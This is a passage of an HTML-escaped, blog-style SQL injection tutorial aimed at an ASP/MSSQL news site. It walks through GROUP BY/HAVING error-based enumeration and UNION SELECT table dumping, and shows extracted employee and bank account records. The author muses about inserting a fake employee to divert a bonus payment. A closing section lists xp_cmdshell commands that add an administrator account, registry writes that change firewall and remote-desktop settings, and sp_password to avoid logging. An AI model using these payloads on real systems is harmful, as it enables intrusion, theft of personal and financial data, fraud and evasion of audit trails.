&lt;span style=&quot;font-size: small;&quot;&gt;Column &#39;NEWS.NewsID&#39; is invalid in the select list because it is not  contained in an aggregate function and there is no GROUP BY clause. &lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;So what exactly did I achieve there? &lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;That, &#39;NEWS.NewsID&#39; is the first column in the table NEWS&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;So by adding GROUP BY  NEWSID(http://localhost/news/display.asp?id=75+GROUP+BY+NEWSID+HAVING  1=1--) &lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;I receive a new error message and you guessed it, the second column in  the NEWS table is given to me.&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
-------------------------------------------------------------------&lt;br /&gt;
&lt;b style=&quot;color: lime;&quot;&gt;&lt;i&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: large;&quot;&gt;Section 3 - Moving the point of reference&lt;/span&gt;&lt;/i&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
-------------------------------------------------------------------&lt;br /&gt;
&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;Well that&#39;s great, but I doubt we&#39;ll be able to get anything remotely  exciting in the news table, to be honest I&#39;d rather watch Season 4 of  House with commentary than stare at the info for a bunch of news  articles, so what we need to do next is find other tables contained in  the Database. Now we know the site has a sql injection vulnerability and  we were already able to find the complete structure of one table, so by  amending the sql query a bit, it spits out the info we need...&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;So from here I try the query UNION SELECT name FROM sys objects...&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;But now I get an error message, why? &lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;Each SQL statement within the UNION query must have the same number of  fields in the result sets with similar data types.&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;This is translated a bit from the original error message for a bit more  clarity, I need to UNION with the same number of columns and these  columns MUST match the same data types...&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;Let&#39;s take a closer look at this based on the previous example:&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;TBLDEMO&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;div style=&quot;color: yellow;&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt;ID TEXT  ACTIVE  GROUP&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;color: yellow;&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt;1 First Result TRUE  0 &lt;/span&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;color: yellow;&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt; 2 Second Result FALSE  54&lt;/span&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;color: yellow;&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt; 3 Third Result TRUE  54 &lt;/span&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;color: yellow;&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt; 4 Fourth Result FALSE  36&lt;/span&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;color: yellow;&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt; 5 RAMBO  FALSE  1&lt;/span&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;color: yellow;&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt; 6 NULL  TRUE  0&lt;/span&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;TBLUNION&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;ID TEXT  UserID  Username     Password&lt;/span&gt;&lt;br /&gt;
&lt;div style=&quot;color: yellow;&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt;1 First Result TRUE  john  john&lt;/span&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;color: yellow;&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt; 2 Second Result FALSE  mike  mike &lt;/span&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;color: yellow;&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt; 3 Third Result TRUE  Larry  Larry   &lt;/span&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;color: yellow;&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt; 4 Fourth Result FALSE  Natasha  Natasha&lt;/span&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;color: yellow;&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt; 5 RAMBO  FALSE  Bruce  Bruce&lt;/span&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;color: yellow;&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt; 6 NULL  TRUE  Chuck  Chuck&lt;/span&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;So let&#39;s take the SQL query from the first example and add a union query  to it:&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;SELECT Text, ACTIVE, GROUP FROM TBLDEMO WHERE ID = X UNION SELECT  Username,Password FROM TBLUNION&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;So the first problem is that the first part of the query select 3  columns whilst the second part only select 2...&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;We&#39;ll need to amend this so both &quot;sides&quot; of the union query select the  same number of results&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;SELECT Text, ACTIVE, GROUP FROM TBLDEMO WHERE ID = X UNION SELECT  Username,Password,UserID FROM TBLUNION&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;Now a new error, &quot;Cannot convert...whatever&quot; &lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;This is where data types comes into play, &lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;Compare the columns like so:&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;div style=&quot;color: yellow;&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt;TEXT  USERNAME&lt;/span&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;color: yellow;&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt; ACTIVE  PASSWORD&lt;/span&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;color: yellow;&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt; GROUP  USERID&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;If these columns are rewritten to display the type of data it can take  it should like something like this:&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;div style=&quot;color: yellow;&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt;String  String  (Correct)&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;color: yellow;&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt;Boolean  String (Wrong)&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;span style=&quot;color: yellow;&quot;&gt;Integer  Integer (Correct)&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;So we should rewrite the query so the statements are the same in &lt;/span&gt;&lt;br /&gt;
&lt;div style=&quot;color: yellow;&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;color: yellow;&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt; 1) NUMBER&lt;/span&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;color: yellow;&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt; 2) DATA TYPE&lt;/span&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;So what happens when a query select 7 columns but the table your trying  to read from only has 3? &lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;Use the same column more than once...&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;UNION SELECT TEXT,TEXT,TEXT,TEXT,TEXT,TEXT,TEXT FROM TBLDEMO;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;This is a perfectly valid SQL query, it will display the same info 7  times, but sometimes that&#39;s the easiest way to extract the information.&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;Getting table names, continued...&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;So from here let&#39;s carry on with the previous query and extract table  names from the application.&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;UNION SELECT name,name,name,name FROM sys objects.&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;The page loads just fine when this UNION statement is added and the info  isn&#39;t displayed anywhere on the page...&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;Now we&#39;ll have to generate an error to get the info we require, this can  be done in the same fashion as when extracting column names Having 1=1  and GROUP BY &lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;UNION SELECT name,name,name,name FROM sys objects HAVING 1 = 1&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
-------------------------------------------------------------------&lt;br /&gt;
&lt;span style=&quot;font-size: large;&quot;&gt;&lt;i style=&quot;color: lime;&quot;&gt;&lt;b&gt;Section 4 - In Closing&lt;/b&gt;&lt;/i&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
-------------------------------------------------------------------&lt;br /&gt;
&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;Now we receive the first table in the database, we could go on with  GROUP BY and comma separate each result, but most web server only  process requests up to that many characters then you start seeing 404  errors (Page not found)&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;Most of your first results should be system tables, you can exclude  these tables by adding where type = &#39;U&#39;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;This will force the SQL query to only bring back results where the table  was created by a user ie. NOT the default system tables...&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;Carrying on like this (Yes I know it can be time consuming) you should  be able to see each table in the database, if there are so many tables  that you can&#39;t carry on and system tables are already excluded, look  into the statement &lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;WHERE name NOT LIKE &#39;%sometext%&#39; I&#39;m not going to go into detail on this  since it is quite rare.&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;So while digging I discovered the following interesting tables and the  row&#39;s values in each table:&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br style=&quot;color: blue;&quot; /&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;color: blue; font-size: small;&quot;&gt; &lt;span style=&quot;color: yellow;&quot;&gt;Table name + column name         Value returned &lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;color: yellow; font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;div style=&quot;color: yellow;&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt; Competition.CompetitionID 1 &lt;/span&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;color: yellow;&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt; Competition.Name          Apr-08 &lt;/span&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;color: yellow;&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt; Competition.bankNo  ###### &lt;/span&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;color: yellow;&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt; Competition.Outstanding  TRUE &lt;/span&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;color: yellow;&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt; Competition.basevalue  4000 &lt;/span&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;color: yellow;&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt; Competition.competition  Employee of the month &lt;/span&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;color: yellow;&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt; Competition.Winner  John Doe &lt;/span&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;color: yellow;&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt; Competition.WinnerID  34 &lt;/span&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;color: yellow;&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt; Competition.TransactionStatus Pending &lt;/span&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;color: yellow;&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;color: yellow;&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt; Table name + column name         Value returned   &lt;/span&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;color: yellow;&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt; Employees.ID   1 &lt;/span&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;color: yellow;&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt; Employees.Name   Bill &lt;/span&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;color: yellow;&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt; Employees.Surname  Gates &lt;/span&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;color: yellow;&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt; Employees.Email   bill@gmail.com &lt;/span&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;color: yellow;&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt; Employee.Department  Management &lt;/span&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;color: yellow;&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt; Employees.DepartmentBuildingID 1 &lt;/span&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;color: yellow;&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt; Employees.Branch          Head Office &lt;/span&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;color: yellow;&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt; Employees.Salary          MASKED (some insane value) &lt;/span&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;color: yellow;&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt; Empluyees.JobTitle  CEO &lt;/span&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;color: yellow;&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt; Employees.BankAccountNr  11111111 &lt;/span&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;color: yellow;&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt; Employees.BankAccountName General Savings &lt;/span&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;color: yellow;&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt; Employees.BankAccountCode 1534 &lt;/span&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;color: yellow;&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt; Employees.LeaveDue  98 &lt;/span&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;color: yellow;&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt; Employees.Phone Number  555-555 55 &lt;/span&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;color: yellow;&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt; Employees.CellNumber  065 5452 54111 &lt;/span&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;color: blue; font-size: small;&quot;&gt; Employees.Address  Some address &lt;/span&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br style=&quot;color: blue;&quot; /&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;So from this information I can deduce that there is a bonus paid to the  employee of the month, so I wonder, what would happen if I create a new  employee on the system, rig the database to pay the bonus to that  employee and set up the bank account for this new employee as my own? &lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;The short answer: Unless you&#39;re really good with making money and people  disappear, you&#39;d get caught, which is something I&#39;m not covering in  this tutorial :)&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;So anyway, by running a INSERT INTO Employees values [the values]  statement and running this same statement on the Competition table, I  should receive a large little bonus next month.&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;I&#39;ve explained the very basics of gathering the information required.  Making changes in the DB, that&#39;s up to you, I&#39;ve never been a fan of  &quot;here you go, now your an elite h4x0r&quot; because it really makes script  kiddies think they know everything.&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
-------------------------------------------------------------------&lt;br /&gt;
&lt;span style=&quot;font-size: large;&quot;&gt;&lt;i style=&quot;color: lime;&quot;&gt;&lt;b&gt;Section 5 - Going further&lt;/b&gt;&lt;/i&gt;&lt;/span&gt;&lt;br /&gt;
-------------------------------------------------------------------&lt;br /&gt;
&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;This guide was written as a very basic introduction for those who are  just starting out, but for those of who you are a bit further than  getting names and data, I still wanted to include a few things so you  too can gain from this article, I suggest you take a look at the  following procedures:&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br style=&quot;color: blue;&quot; /&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;color: blue; font-size: small;&quot;&gt; &lt;span style=&quot;color: yellow;&quot;&gt;1) Xp_cmdshell `net user foo bar /ADD&#39; Xp_cmdshell `net localgroup /ADD  Administrators foo&lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;color: yellow; font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;div style=&quot;color: yellow;&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;color: yellow;&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt; 2)sp_makewebtask (Probably my all time favorite since so many sys admins  block CMDShell and not Makewebtask)&lt;/span&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;color: yellow;&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;color: yellow;&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt; 3) XP_RegRead &amp;amp; XP_RegWrite&lt;/span&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;color: yellow;&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt;   [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile]&lt;/span&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;color: yellow;&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt;  [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]&lt;/span&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;color: yellow;&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt; (Note if a hardware firewall is preventing the connection, this trick  will not work)  &lt;/span&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;color: yellow;&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;color: yellow;&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt; 4) SP_Password (Just to prevent logging :) )&lt;/span&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
